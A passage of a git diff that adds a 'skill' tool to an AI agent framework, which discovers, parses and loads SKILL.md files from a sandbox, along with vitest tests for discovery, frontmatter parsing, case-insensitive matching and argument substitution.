 .../__tests__/parseSkillFrontmatter.test.ts   |  56 ++++++
 .../__tests__/substituteArguments.test.ts     |  22 +++
 lib/skills/discoverSkills.ts                  |  89 +++++++++
 lib/skills/extractSkillBody.ts                |  14 ++
 lib/skills/findSkillFile.ts                   |  33 ++++
 lib/skills/getGlobalSkillsDirectory.ts        |  14 ++
 lib/skills/getSandboxSkillDirectories.ts      |  16 ++
 lib/skills/getSkills.ts                       |  22 +++
 lib/skills/injectSkillDirectory.ts            |  11 ++
 lib/skills/parseSkillFrontmatter.ts           |  52 ++++++
 lib/skills/skillTypes.ts                      |  76 ++++++++
 lib/skills/substituteArguments.ts             |  14 ++
 27 files changed, 1071 insertions(+), 19 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts
 create mode 100644 lib/agent/tools/skillTool.ts
 create mode 100644 lib/skills/__tests__/discoverSkills.test.ts
 create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts
 create mode 100644 lib/skills/__tests__/findSkillFile.test.ts
 create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
 create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts
 create mode 100644 lib/skills/__tests__/getSkills.test.ts
 create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts
 create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts
 create mode 100644 lib/skills/__tests__/substituteArguments.test.ts
 create mode 100644 lib/skills/discoverSkills.ts
 create mode 100644 lib/skills/extractSkillBody.ts
 create mode 100644 lib/skills/findSkillFile.ts
 create mode 100644 lib/skills/getGlobalSkillsDirectory.ts
 create mode 100644 lib/skills/getSandboxSkillDirectories.ts
 create mode 100644 lib/skills/getSkills.ts
 create mode 100644 lib/skills/injectSkillDirectory.ts
 create mode 100644 lib/skills/parseSkillFrontmatter.ts
 create mode 100644 lib/skills/skillTypes.ts
 create mode 100644 lib/skills/substituteArguments.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index f9a894195..704035c64 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = convertToModelMessages(input.messages);
-  const tools = buildAgentTools();
+  const tools = buildAgentTools({ skills: input.agentContext.skills });
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 5478c59ca..fb5d99a5a 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const EXPECTED_TOOL_NAMES = [
+const BASE_TOOLS = [
   "bash",
   "read",
   "write",
@@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns a tools record with all 8 leaf tools registered", () => {
+  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
     const tools = buildAgentTools();
-    for (const name of EXPECTED_TOOL_NAMES) {
+    for (const name of BASE_TOOLS) {
       expect(tools).toHaveProperty(name);
     }
+    expect(tools).not.toHaveProperty("skill");
+  });
+
+  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "commit",
+          description: "Make a commit",
+          path: "/sandbox/mono/skills/commit",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    });
+    expect(tools).toHaveProperty("skill");
+    for (const name of BASE_TOOLS) {
+      expect(tools).toHaveProperty(name);
+    }
+  });
+
+  it("omits the skill tool when an empty array is passed", () => {
+    const tools = buildAgentTools({ skills: [] });
+    expect(tools).not.toHaveProperty("skill");
   });
 
   it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
-    const tools = buildAgentTools() as Record<
-      string,
-      { description?: unknown; inputSchema?: unknown; execute?: unknown }
-    >;
-    for (const name of EXPECTED_TOOL_NAMES) {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "foo",
+          description: "x",
+          path: "/p",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
+    for (const name of [...BASE_TOOLS, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index f9cbc2b39..393b32889 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool";
 import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
- * Each tool reads its sandbox handle + recoup creds from `experimental_context`
- * at execute time — the factory takes no arguments because the tools are
- * stateless modulo that context.
+ * Each tool reads its sandbox handle + per-prompt context from
+ * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 8 leaf tools:
- *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ * Currently ships up to 9 tools:
+ *   - 6 file/shell: bash, read, write, edit, grep, glob
  *   - todo_write (planning surface; stateless, echoes the list back)
  *   - web_fetch (HTTP via curl inside the sandbox)
+ *   - skill (load a discovered skill's SKILL.md; only registered when the
+ *     sandbox has skills available, so models without any skill catalog
+ *     don't see the tool at all and never call it speculatively)
  *
- * Composite tools (`task` subagent, `ask_user_question` UI part,
- * `skill` skill discovery) port in a follow-up PR — they require
- * subagent context plumbing / UI rendering / skill discovery infra
- * that isn't in api today.
+ * @param options.skills - Discovered skill catalog. When empty / undefined,
+ *   `skill` is omitted from the tool record so the model doesn't see it.
  */
-export function buildAgentTools() {
+export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) {
+  const hasSkills = (options.skills?.length ?? 0) > 0;
   return {
     bash: bashTool,
     read: readFileTool,
@@ -33,6 +36,7 @@ export function buildAgentTools() {
     glob: globTool,
     todo_write: todoWriteTool,
     web_fetch: webFetchTool,
+    ...(hasSkills ? { skill: skillTool } : {}),
   };
 }
 
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
index 63d2a1b7e..acb455164 100644
--- a/lib/agent/tools/AgentContext.ts
+++ b/lib/agent/tools/AgentContext.ts
@@ -1,4 +1,5 @@
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Per-tool-call context threaded into the agent via `streamText`'s
@@ -31,4 +32,14 @@ export type AgentContext = {
    * Public information — no security risk in exposing.
    */
   recoupOrgId?: string;
+  /**
+   * Skills discovered in the sandbox before workflow start (handler
+   * calls `discoverSkills(sandbox, await getSandboxSkillDirectories(sandbox))`).
+   * The `skillTool` reads this list to:
+   *   - resolve names → SKILL.md paths
+   *   - filter out skills with `disable-model-invocation`
+   *   - surface "Available skills" hints when a model picks an unknown name
+   * Empty / undefined when no skills were discovered or discovery failed.
+   */
+  skills?: SkillMetadata[];
 };
diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts
new file mode 100644
index 000000000..0b3196dbc
--- /dev/null
+++ b/lib/agent/tools/__tests__/skillTool.test.ts
@@ -0,0 +1,169 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(readFile: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", readFile };
+}
+
+function skillMd(body: string) {
+  return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`;
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("skillTool", () => {
+  it("returns success:false with available skills when the requested skill isn't in context", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "unknown" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "Make a commit",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+          {
+            name: "deploy",
+            description: "Deploy",
+            path: "/sandbox/mono/skills/deploy",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: commit, deploy/);
+  });
+
+  it("returns success:false when no skills are loaded", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: { ...baseCtx, skills: [] },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: none/);
+  });
+
+  it("matches the skill name case-insensitively (slash-command behavior)", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!(
+      { skill: "COMMIT" }, // model typed it loud
+      {
+        experimental_context: {
+          ...baseCtx,
+          skills: [
+            {
+              name: "commit",
+              description: "x",
+              path: "/sandbox/mono/skills/commit",
+              filename: "SKILL.md",
+              options: {},
+            },
+          ],
+        },
+      } as never,
+    )) as { success: boolean; skillName: string };
+    expect(result.success).toBe(true);
+    expect(result.skillName).toBe("COMMIT");
+  });
+
+  it("returns the SKILL.md body with skill directory injected", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ...")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; content: string; skillPath: string };
+    expect(result.success).toBe(true);
+    expect(result.skillPath).toBe("/sandbox/mono/skills/commit");
+    expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit");
+    expect(result.content).toContain("Run git commit -m ...");
+    expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8");
+  });
+
+  it("substitutes $ARGUMENTS in the skill body when args are provided", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"')));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit", args: "fix bug" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { content: string };
+    expect(result.content).toContain('git commit -m "fix bug"');
+    expect(result.content).not.toContain("$ARGUMENTS");
+  });
+
+  it("rejects skills with disable-model-invocation set", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "internal" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "internal",
+            description: "x",
+            path: "/sandbox/mono/skills/internal",
+            filename: "SKILL.md",
+            options: { disableModelInvocation: true },
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/cannot be invoked/);
+  });
+
+  it("returns success:false when the SKILL.md read fails", async () => {
+    const sb = makeSandbox(vi.fn().mockRejectedValue(new Error("ENOENT")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/ENOENT/);
+  });
+});
diff --git a/lib/agent/tools/skillTool.ts b/lib/agent/tools/skillTool.ts
new file mode 100644
index 000000000..8c74f35d1
--- /dev/null
+++ b/lib/agent/tools/skillTool.ts
@@ -0,0 +1,87 @@
+import * as path from "path";
+import { tool } from "ai";
+import { z } from "zod";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+import { getSkills } from "@/lib/skills/getSkills";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+const skillInputSchema = z.object({
+  skill: z.string().describe("The skill name to invoke"),
+  args: z.string().optional().describe("Optional arguments for the skill"),
+});
+
+/**
+ * `skill` — load a discovered skill's SKILL.md body and return it
+ * to the model. The model then follows the loaded instructions in
+ * subsequent turns (using `bash`, `read`, `write`, etc. to actually
+ * carry them out). The skill catalog itself is discovered in the
+ * handler before workflow start and threaded via `AgentContext.skills`.
+ *
+ * Matching is case-insensitive so the model can resolve a slash command
+ * like `/Commit` against a skill named `commit`. Skills marked with
+ * `disable-model-invocation` in their frontmatter are filtered out at
+ * the gate — only the user (via a server-side dispatcher) can run them.
+ */
+export const skillTool = tool({
+  description: `Execute a skill within the main conversation.
+
+When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge.
+
+When users ask you to run a "slash command" or reference "/<something>" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill.
+
+How to invoke:
+- Use this tool with the skill name and optional arguments
+- Examples:
+  - skill: "pdf" — invoke the pdf skill
+  - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments
+
+Important:
+- When a skill is relevant, invoke this tool IMMEDIATELY as your first action
+- When the user's message starts with "/<name>", they are invoking a skill — call this tool FIRST before any other tool
+- NEVER just announce or mention a skill without actually calling this tool
+- Only use skills listed in "Available skills" in your system prompt`,
+  inputSchema: skillInputSchema,
+  execute: async ({ skill, args }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "skill");
+    const skills = getSkills(experimental_context);
+
+    const normalized = skill.toLowerCase();
+    const found = skills.find(s => s.name.toLowerCase() === normalized);
+    if (!found) {
+      const available = skills.map(s => s.name).join(", ");
+      return {
+        success: false,
+        error: `Skill '${skill}' not found. Available skills: ${available || "none"}`,
+      };
+    }
+
+    if (found.options.disableModelInvocation) {
+      return {
+        success: false,
+        error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`,
+      };
+    }
+
+    const skillFilePath = path.join(found.path, found.filename);
+    let fileContent: string;
+    try {
+      fileContent = await sandbox.readFile(skillFilePath, "utf-8");
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read skill file: ${message}` };
+    }
+
+    const body = extractSkillBody(fileContent);
+    const bodyWithDir = injectSkillDirectory(body, found.path);
+    const content = substituteArguments(bodyWithDir, args);
+
+    return {
+      success: true,
+      skillName: skill,
+      skillPath: found.path,
+      content,
+    };
+  },
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index fb3b434f1..702edb918 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -39,6 +39,19 @@ vi.mock("@/lib/networking/getCorsHeaders", () => ({
 }));
 vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
+// Stub sandbox connection + skill discovery so handler tests don't actually
+// try to talk to Vercel Sandbox / parse SKILL.md files. The handler treats
+// discovery failures as non-fatal (empty catalog), but we mock to keep tests fast.
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })),
+}));
+vi.mock("@/lib/skills/discoverSkills", () => ({
+  discoverSkills: vi.fn(async () => []),
+}));
+vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({
+  getSandboxSkillDirectories: vi.fn(() => ["/sandbox/mono/skills"]),
+}));
+
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
 const SESSION_ID = "22222222-2222-2222-2222-222222222222";
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 6ceb0c867..818c70f8c 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import { extractOrgId } from "@/lib/recoupable/extractOrgId";
 import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   const recoupOrgId = session.clone_url
     ? (extractOrgId(session.clone_url) ?? undefined)
     : undefined;
+
+  // Connect the sandbox up-front so we can discover its installed skills
+  // before starting the workflow. The connected handle isn't passed into
+  // the workflow (it's not durably serializable) — only `sandbox.state`
+  // is. Tools reconnect via `connectVercel(state)` inside `"use step"`.
+  let skills: Awaited<ReturnType<typeof discoverSkills>> = [];
+  try {
+    const sandbox = await connectVercel(session.sandbox_state as VercelState);
+    const dirs = await getSandboxSkillDirectories(sandbox);
+    skills = await discoverSkills(sandbox, dirs);
+  } catch (error) {
+    console.error(
+      "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:",
+      error,
+    );
+  }
+
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
@@ -105,6 +125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
           workingDirectory: DEFAULT_WORKING_DIRECTORY,
         },
         recoupOrgId,
+        skills,
         // No `recoupAccessToken`: handing the long-lived api key to bash
         // would let any model-issued command exfiltrate it via env. Proper
         // short-lived token minting lands alongside the `skill` tool port
diff --git a/lib/skills/__tests__/discoverSkills.test.ts b/lib/skills/__tests__/discoverSkills.test.ts
new file mode 100644
index 000000000..a252ba0b8
--- /dev/null
+++ b/lib/skills/__tests__/discoverSkills.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+
+function makeStat(isDir: boolean) {
+  return { isDirectory: () => isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 }; // stat-result stub; size/mtime are always 0
+}
+
+function makeDirent(name: string, isDir: boolean) {
+  return {
+    name,
+    isDirectory: () => isDir,
+    isFile: () => !isDir, // a stub entry is either a directory or a regular file
+    isSymbolicLink: () => false, // every remaining entry-kind predicate always reports false
+    isBlockDevice: () => false,
+    isCharacterDevice: () => false,
+    isFIFO: () => false,
+    isSocket: () => false,
+  };
+}
+
+function frontmatter(name: string, description: string, extra = "") {
+  return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`; // a non-empty `extra` must end with "\n": it is spliced directly before the closing `---`
+}
+
+function makeSandbox() {
+  const files = new Map<string, string>(); // in-memory file table: absolute path -> content
+  return {
+    files,
+    workingDirectory: "/sandbox/mono",
+    stat: vi.fn(async (path: string) => {
+      if (path.endsWith("/skills")) return makeStat(true);
+      if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true);
+      throw new Error(`ENOENT: ${path}`); // any other path is treated as missing
+    }),
+    readdir: vi.fn(), // no default listing; each test supplies its own entries
+    access: vi.fn(async (path: string) => {
+      if (!files.has(path)) throw new Error(`ENOENT: ${path}`); // resolves only for paths present in `files`
+    }),
+    readFile: vi.fn(async (path: string) => {
+      const content = files.get(path);
+      if (content === undefined) throw new Error(`ENOENT: ${path}`);
+      return content;
+    }),
+  };
+}
+
+beforeEach(() => vi.clearAllMocks()); // reset recorded vi.fn calls between tests
+
+describe("discoverSkills", () => {
+  it("discovers a single skill with name + description + path", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("commit", true)]);
+    sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); // `as never`: the stub only implements the methods used here
+    expect(skills).toHaveLength(1);
+    expect(skills[0]).toMatchObject({
+      name: "commit",
+      description: "Make a commit",
+      path: "/sandbox/mono/skills/commit",
+      filename: "SKILL.md",
+    });
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]);
+    sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc")); // only the lowercase file exists
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.filename).toBe("skill.md");
+  });
+
+  it("returns [] when the directory does not exist", async () => {
+    const sb = makeSandbox();
+    sb.stat.mockRejectedValue(new Error("ENOENT")); // every stat call rejects, including the scanned directory
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toEqual([]);
+  });
+
+  it("skips entries that aren't directories", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]);
+    sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("good");
+  });
+
+  it("skips subdirs without SKILL.md / skill.md", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]);
+    sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes")); // nothing is registered for "empty"
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("real");
+  });
+
+  it("skips skills with invalid frontmatter (missing required fields)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]);
+    sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc"); // frontmatter lacks `description`
+    sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("ok");
+  });
+
+  it("skips skills whose names shadow built-in commands (model / resume / new)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([
+      makeDirent("model", true),
+      makeDirent("resume", true),
+      makeDirent("new", true),
+      makeDirent("kept", true),
+    ]);
+    for (const name of ["model", "resume", "new", "kept"]) {
+      sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x"));
+    }
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills.map(s => s.name)).toEqual(["kept"]);
+  });
+
+  it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockImplementation(async (dir: string) => {
+      if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never;
+      if (dir === "/global/.skills") return [makeDirent("foo", true)] as never;
+      return [];
+    });
+    sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project"));
+    sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global")); // differs from "Foo" only by case
+    sb.stat.mockImplementation(async (p: string) => {
+      if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true);
+      throw new Error("ENOENT");
+    });
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.description).toBe("project"); // first dir wins
+  });
+
+  it("populates options from frontmatter (camelCase + split lists)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("scoped", true)]);
+    sb.files.set(
+      "/sandbox/mono/skills/scoped/SKILL.md",
+      frontmatter(
+        "scoped",
+        "limited",
+        "allowed-tools: bash, read\ndisable-model-invocation: true\n",
+      ),
+    );
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills[0]?.options).toEqual({
+      disableModelInvocation: true,
+      allowedTools: ["bash", "read"],
+    });
+  });
+});
diff --git a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts
new file mode 100644
index 000000000..b8f62bbc8
--- /dev/null
+++ b/lib/skills/__tests__/extractSkillBody.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+
+describe("extractSkillBody", () => {
+  it("strips YAML frontmatter and returns the body", () => {
+    const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody.";
+    expect(extractSkillBody(md)).toBe("# Heading\n\nBody.");
+  });
+
+  it("returns the full content when no frontmatter is present", () => {
+    expect(extractSkillBody("# Just a heading")).toBe("# Just a heading");
+  });
+
+  it("trims surrounding whitespace", () => {
+    expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body"); // blank lines on both sides of the body are dropped
+  });
+
+  it("tolerates Windows-style CRLF line endings", () => {
+    const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody"; // every line break is \r\n
+    expect(extractSkillBody(md)).toBe("body");
+  });
+});
diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts
new file mode 100644
index 000000000..2d15de6fa
--- /dev/null
+++ b/lib/skills/__tests__/findSkillFile.test.ts
@@ -0,0 +1,34 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
+
+beforeEach(() => vi.clearAllMocks()); // reset recorded vi.fn calls between tests
+
+function makeSandbox(existing: string[]) {
+  const set = new Set(existing); // the only paths that count as existing
+  return {
+    access: vi.fn(async (p: string) => {
+      if (!set.has(p)) throw new Error(`ENOENT: ${p}`); // resolves (with undefined) for known paths, rejects otherwise
+    }),
+  };
+}
+
+describe("findSkillFile", () => {
+  it("prefers uppercase SKILL.md when both casings exist", async () => {
+    const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/SKILL.md");
+    expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md"); // the uppercase candidate was probed
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox(["/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/skill.md");
+  });
+
+  it("returns null when neither casing exists", async () => {
+    const sb = makeSandbox([]); // empty sandbox: every access call rejects
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBeNull();
+  });
+});
diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
new file mode 100644
index 000000000..7833f2450
--- /dev/null
+++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
@@ -0,0 +1,15 @@
+import { describe, it, expect } from "vitest";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+describe("getGlobalSkillsDirectory", () => {
+  it("returns <home>/.agents/skills", () => {
+    expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills");
+    expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe(
+      "/home/vercel-sandbox/.agents/skills",
+    );
+  });
+
+  it("handles trailing slash on input", () => {
+    expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills"); // no doubled slash in the result
+  });
+});
diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
new file mode 100644
index 000000000..5762ccea1
--- /dev/null
+++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
@@ -0,0 +1,23 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
